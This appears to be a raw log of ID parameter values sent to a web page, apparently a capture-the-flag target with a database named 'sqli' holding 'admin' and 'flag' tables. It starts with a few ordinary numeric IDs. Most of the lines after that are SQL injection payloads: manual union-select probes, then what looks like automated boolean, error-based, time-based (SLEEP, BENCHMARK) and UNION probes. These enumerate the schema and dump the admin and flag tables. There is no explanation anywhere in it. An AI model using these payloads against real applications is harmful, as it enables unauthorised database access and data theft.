ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:2
ID:2
ID:1
ID:1'
ID:1'
ID:1'
ID:1
ID:1
ID:1'
ID:1'
ID:1' and 'a'='a
ID:1‘
ID:1
ID:1'
ID:1' and 1=1 -- 
ID:1' and 1=1 --  union select 1,2,3
ID:1' and 1=1  union select 1,2,3-- 
ID:1' and 1=1  union select 1,2,3 -- 
ID:1' 20union select 1,2,3 -- 
ID:1'union select 1,2,3 -- 
ID:2'union select 1,2,3 -- 
ID:2'union select 1,2,3 -- '
ID:2'union select 1,2,3 -- 
ID:2' union select 1,2,3 -- 
ID:4' union select 1,2,3 -- 
ID:4' union select 1,2 -- 
ID:4' union select 1,2,3 -- 
ID:4' union select 1,2,database() -- 
ID:4' union select 1,2,database() -- 
ID:4' union select 1,database(),3 -- 
ID:4' union select 1,version(),3 -- 
ID:4' union select 1,group_concat(schema_name) from information_schema.schemata,3 -- 
ID:4' union select 1,database(),3 -- 
ID:4' union select 1,7,3 -- 
ID:' union select database() -- 
ID:' union select 1,database(),3 -- 
ID:' union select 1,@@datedir,3 -- 
ID:' union select 1,@@datadir,3 -- 
ID:' union select 1,@@version_compile_os,3 -- 
ID:' union select 1,(group_concat(schema_name) from information_schema.schemata),3 -- 
ID:' union select 1,(group_concat(table_name) from information_schema.tables),3 -- 
ID:' union select 1,(group_concat(schema_name) from information_schema.schemata),3 -- 
ID:' union select 1,select * from sqli,3 -- 
ID:' union select 1,(select * from sqli),3 -- 
ID:' union select 1,(select *),3 -- 
ID:' union select 1,(group_concat(schema_name) from information_schema.schemata*),3 -- 
ID:' union select 1,(select * from admin),3 -- 
ID:' union select 1,(select flag from flag),3 -- 
ID:' union select 1,group_concat(schema_name) from information_schema.schemata,3 -- 
ID:' union select 1,(group_concat(schema_name) from information_schema.schemata),3 -- 
ID:' union select 1,(group_concat(column_name) from information_schema.columns),3 -- 
ID:' union select 1,(select flag from flag),3 -- 
ID:2
ID:2
ID:1
ID:2
ID:3
ID:7
ID:7
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:
ID:2
ID:3
ID:1
ID:2
ID:1
ID:1
ID:1
ID:
ID:
ID:
ID:1
ID:
ID:
ID:
ID:
ID:
ID:1
ID:2
ID:3
ID:3
ID:3
ID:3
ID:3
ID:3
ID:999
ID:
ID:1
ID:2
ID:2
ID:99
ID:99
ID:99
ID:1
ID:1
ID:1
ID:
ID:
ID:1
ID:
ID:
ID:
ID:
ID:
ID:
ID:
ID:
ID:
ID:
ID:
ID:1
ID:2
ID:1
ID:2
ID:3
ID:3
ID:999
ID:999
ID:999
ID:999
ID:6238
ID:999),,.),',("
ID:999'JicYBg<'">yYuVIZ
ID:999) AND 9520=9030 AND (4394=4394
ID:999) AND 9866=9866 AND (6701=6701
ID:999 AND 6922=5440
ID:999 AND 9866=9866
ID:999 AND 7452=7487-- qgdI
ID:999 AND 9866=9866-- qVIA
ID:999') AND 3114=1427 AND ('QSGg'='QSGg
ID:999') AND 9866=9866 AND ('iXOV'='iXOV
ID:999' AND 4711=7569 AND 'IGHK'='IGHK
ID:999' AND 9866=9866 AND 'MRHh'='MRHh
ID:999' AND 7399=5733 AND 'MdSc'='MdSc
ID:999' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162717a71,(SELECT (ELT(7076=7076,1))),0x71786b7871,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'ntOz'='ntOz
ID:999' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162717a71,(SELECT (ELT(9462=9462,1))),0x71786b7871,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'xXHW'='xXHW
ID:999' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162717a71,(SELECT (ELT(1171=1171,1))),0x71786b7871,0x78))x)) AND 'JrRW'='JrRW
ID:999' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162717a71,(SELECT (ELT(4614=4614,1))),0x71786b7871,0x78))x)) AND 'AWpW'='AWpW
ID:999' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162717a71,(SELECT (ELT(3632=3632,1))),0x71786b7871)) USING utf8))) AND 'KyPl'='KyPl
ID:999' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162717a71,(SELECT (ELT(7992=7992,1))),0x71786b7871)) USING utf8))) AND 'RgCj'='RgCj
ID:999' AND (SELECT 5629 FROM(SELECT COUNT(*),CONCAT(0x7162717a71,(SELECT (ELT(5629=5629,1))),0x71786b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'lhUO'='lhUO
ID:(SELECT CONCAT(0x7162717a71,(SELECT (ELT(5689=5689,1))),0x71786b7871))
ID:999
ID:999
ID:999
ID:999
ID:999
ID:999
ID:999
ID:999
ID:999';SELECT SLEEP(5)#
ID:999';SELECT SLEEP(5) AND 'NsrT'='NsrT
ID:999';(SELECT * FROM (SELECT(SLEEP(5)))xTMf)#
ID:999';(SELECT * FROM (SELECT(SLEEP(5)))IStu) AND 'zNYC'='zNYC
ID:999';SELECT BENCHMARK(5000000,MD5(0x78424a71))#
ID:999';SELECT BENCHMARK(5000000,MD5(0x684c6966)) AND 'hact'='hact
ID:999' AND SLEEP(5) AND 'pkTp'='pkTp
ID:999' AND SLEEP(0) AND 'pkTp'='pkTp
ID:999' AND SLEEP(5) AND 'pkTp'='pkTp
ID:999' ORDER BY 1-- nnWm
ID:999' ORDER BY 1932-- DeWl
ID:999' ORDER BY 10-- THkg
ID:999' ORDER BY 6-- sucF
ID:999' ORDER BY 4-- tmOF
ID:999' ORDER BY 3-- wjVj
ID:999' UNION ALL SELECT NULL,NULL,CONCAT(0x7162717a71,0x7673545a786b4c736e474174494171535145734578614f6c4557556b625968506b7252495363745a,0x71786b7871)-- cvFL
ID:999' UNION ALL SELECT NULL,CONCAT(0x7162717a71,0x4b564c57466a47666a71686242757a47484d47524e776561594748496b71594c4764524949616977,0x71786b7871),NULL-- NPKd
ID:999' UNION ALL SELECT CONCAT(0x7162717a71,0x465a4266684446536f4876674f465361486a504a73726d756f656d454358766b4c706164745a4d6d,0x71786b7871),NULL,NULL-- FvSL
ID:999' UNION ALL SELECT NULL,NULL,CONCAT(0x7162717a71,0x466e6f52536e4a65476f,0x71786b7871)-- Opwk
ID:999' UNION ALL SELECT NULL,CONCAT(0x7162717a71,0x734c5076777056724a43,0x71786b7871),NULL-- dCfe
ID:999' UNION ALL SELECT CONCAT(0x7162717a71,0x6a545475725554647651,0x71786b7871),NULL,NULL-- phBX
ID:-1929' UNION ALL SELECT NULL,NULL,CONCAT(0x7162717a71,0x6e4f4141504a62466c425046436f75786954756c7167704179684b4a664c587670564a5147616547,0x71786b7871)-- iPXc
ID:-3906' UNION ALL SELECT NULL,CONCAT(0x7162717a71,0x62516161456868497946796554636d6863744e48704e56416b426f544a50494a5378526949547861,0x71786b7871),NULL-- oAVr
ID:999' UNION ALL SELECT NULL-- IRZI
ID:999' UNION ALL SELECT NULL,NULL-- eIlw
ID:999' UNION ALL SELECT NULL,NULL,NULL-- CdrM
ID:999' UNION ALL SELECT NULL,NULL,NULL,NULL-- npIr
ID:999' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- hAOW
ID:999' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- BgyT
ID:999' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- HNqd
ID:999' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- jDJu
ID:999' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- HBXe
ID:999' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- BIqW
ID:999' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- RMtg
ID:999' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- zOeB
ID:999' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- HTnw
ID:999' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ruca
ID:999' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ViBn
ID:999' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- LuSh
ID:999' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- VjqZ
ID:999' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ldsv
ID:999' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- XpCb
ID:999' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- GNDZ
ID:999' UNION ALL SELECT NULL,NULL,CONCAT(0x7162717a71,0x44664d6b634c63796e56474a4663586559646148655353497779716675706c48594f525471435461,0x71786b7871)-- kleU
ID:999' UNION ALL SELECT NULL,CONCAT(0x7162717a71,0x4e494e61656b4f4a4b54786d6c57637a727043476f6e555a41455247486269696a41486c4a696f63,0x71786b7871),NULL-- ZGOU
ID:999' UNION ALL SELECT CONCAT(0x7162717a71,0x514e65456855756a48476d784b436a434e6f45414678684b6d55614d6447774a4b6d7145766a586d,0x71786b7871),NULL,NULL-- jUCB
ID:999' UNION ALL SELECT NULL,NULL,CONCAT(0x7162717a71,0x6f6359794b6d674f5752,0x71786b7871)-- BKTt
ID:999' UNION ALL SELECT NULL,CONCAT(0x7162717a71,0x755567677674624d6776,0x71786b7871),NULL-- bmtr
ID:999' UNION ALL SELECT CONCAT(0x7162717a71,0x4c74627a445964774357,0x71786b7871),NULL,NULL-- ccAJ
ID:-3296' UNION ALL SELECT CONCAT(0x7162717a71,0x5548546b4d6a6745674c68796b7a764e714d6c424d6a4963677557586b6d686d716b625748665768,0x71786b7871),NULL,NULL-- WpCG
ID:-2993' UNION ALL SELECT CONCAT(0x7162717a71,(CASE WHEN (8603=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                8603) THEN 1 ELSE 0 END),0x71786b7871),NULL,NULL-- vcaa
ID:-8502' UNION ALL SELECT CONCAT(0x7162717a71,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x71786b7871),NULL,NULL-- jOog
ID:-9889' UNION ALL SELECT CONCAT(0x7162717a71,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x71786b7871),NULL,NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x73716c69)-- TxAA
ID:-1036' UNION ALL SELECT (SELECT CONCAT(0x7162717a71,IFNULL(CAST(table_name AS CHAR),0x20),0x71786b7871) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x73716c69) LIMIT 0,1),NULL,NULL-- BMjW
ID:-8405' UNION ALL SELECT (SELECT CONCAT(0x7162717a71,IFNULL(CAST(table_name AS CHAR),0x20),0x71786b7871) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x73716c69) LIMIT 1,1),NULL,NULL-- Sssl
ID:-4696' UNION ALL SELECT CONCAT(0x7162717a71,IFNULL(CAST(COUNT(*) AS CHAR),0x20),0x71786b7871),NULL,NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e AND table_schema=0x73716c69-- ZWNA
ID:-9646' UNION ALL SELECT (SELECT CONCAT(0x7162717a71,IFNULL(CAST(column_name AS CHAR),0x20),0x7a61636c7775,IFNULL(CAST(column_type AS CHAR),0x20),0x71786b7871) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e AND table_schema=0x73716c69 LIMIT 0,1),NULL,NULL-- rMQr
ID:-1220' UNION ALL SELECT (SELECT CONCAT(0x7162717a71,IFNULL(CAST(column_name AS CHAR),0x20),0x7a61636c7775,IFNULL(CAST(column_type AS CHAR),0x20),0x71786b7871) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e AND table_schema=0x73716c69 LIMIT 1,1),NULL,NULL-- HdDn
ID:-4087' UNION ALL SELECT (SELECT CONCAT(0x7162717a71,IFNULL(CAST(column_name AS CHAR),0x20),0x7a61636c7775,IFNULL(CAST(column_type AS CHAR),0x20),0x71786b7871) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e AND table_schema=0x73716c69 LIMIT 2,1),NULL,NULL-- FxaH
ID:-5734' UNION ALL SELECT CONCAT(0x7162717a71,IFNULL(CAST(COUNT(*) AS CHAR),0x20),0x71786b7871),NULL,NULL FROM sqli.admin-- yQyr
ID:-2456' UNION ALL SELECT (SELECT CONCAT(0x7162717a71,IFNULL(CAST(id AS CHAR),0x20),0x7a61636c7775,IFNULL(CAST(message AS CHAR),0x20),0x7a61636c7775,IFNULL(CAST(name AS CHAR),0x20),0x71786b7871) FROM sqli.admin LIMIT 0,1),NULL,NULL-- zdoy
ID:-6628' UNION ALL SELECT (SELECT CONCAT(0x7162717a71,IFNULL(CAST(id AS CHAR),0x20),0x7a61636c7775,IFNULL(CAST(message AS CHAR),0x20),0x7a61636c7775,IFNULL(CAST(name AS CHAR),0x20),0x71786b7871) FROM sqli.admin LIMIT 1,1),NULL,NULL-- bhHR
ID:-9702' UNION ALL SELECT (SELECT CONCAT(0x7162717a71,IFNULL(CAST(id AS CHAR),0x20),0x7a61636c7775,IFNULL(CAST(message AS CHAR),0x20),0x7a61636c7775,IFNULL(CAST(name AS CHAR),0x20),0x71786b7871) FROM sqli.admin LIMIT 2,1),NULL,NULL-- Aqlb
ID:-4547' UNION ALL SELECT (SELECT CONCAT(0x7162717a71,IFNULL(CAST(id AS CHAR),0x20),0x7a61636c7775,IFNULL(CAST(message AS CHAR),0x20),0x7a61636c7775,IFNULL(CAST(name AS CHAR),0x20),0x71786b7871) FROM sqli.admin LIMIT 3,1),NULL,NULL-- HVLg
ID:-5409' UNION ALL SELECT CONCAT(0x7162717a71,IFNULL(CAST(COUNT(*) AS CHAR),0x20),0x71786b7871),NULL,NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x666c6167 AND table_schema=0x73716c69-- uWui
ID:-2263' UNION ALL SELECT (SELECT CONCAT(0x7162717a71,IFNULL(CAST(column_name AS CHAR),0x20),0x7a61636c7775,IFNULL(CAST(column_type AS CHAR),0x20),0x71786b7871) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x666c6167 AND table_schema=0x73716c69 LIMIT 0,1),NULL,NULL-- mrsO
ID:-5988' UNION ALL SELECT (SELECT CONCAT(0x7162717a71,IFNULL(CAST(column_name AS CHAR),0x20),0x7a61636c7775,IFNULL(CAST(column_type AS CHAR),0x20),0x71786b7871) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x666c6167 AND table_schema=0x73716c69 LIMIT 1,1),NULL,NULL-- XfMF
ID:-9032' UNION ALL SELECT (SELECT CONCAT(0x7162717a71,IFNULL(CAST(column_name AS CHAR),0x20),0x7a61636c7775,IFNULL(CAST(column_type AS CHAR),0x20),0x71786b7871) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x666c6167 AND table_schema=0x73716c69 LIMIT 2,1),NULL,NULL-- hakg
ID:-5102' UNION ALL SELECT CONCAT(0x7162717a71,IFNULL(CAST(COUNT(*) AS CHAR),0x20),0x71786b7871),NULL,NULL FROM sqli.flag-- kIkR
ID:-5419' UNION ALL SELECT CONCAT(0x7162717a71,IFNULL(CAST(flag AS CHAR),0x20),0x7a61636c7775,IFNULL(CAST(id AS CHAR),0x20),0x7a61636c7775,IFNULL(CAST(name AS CHAR),0x20),0x71786b7871),NULL,NULL FROM sqli.flag-- RIeg
ID:999
ID:999
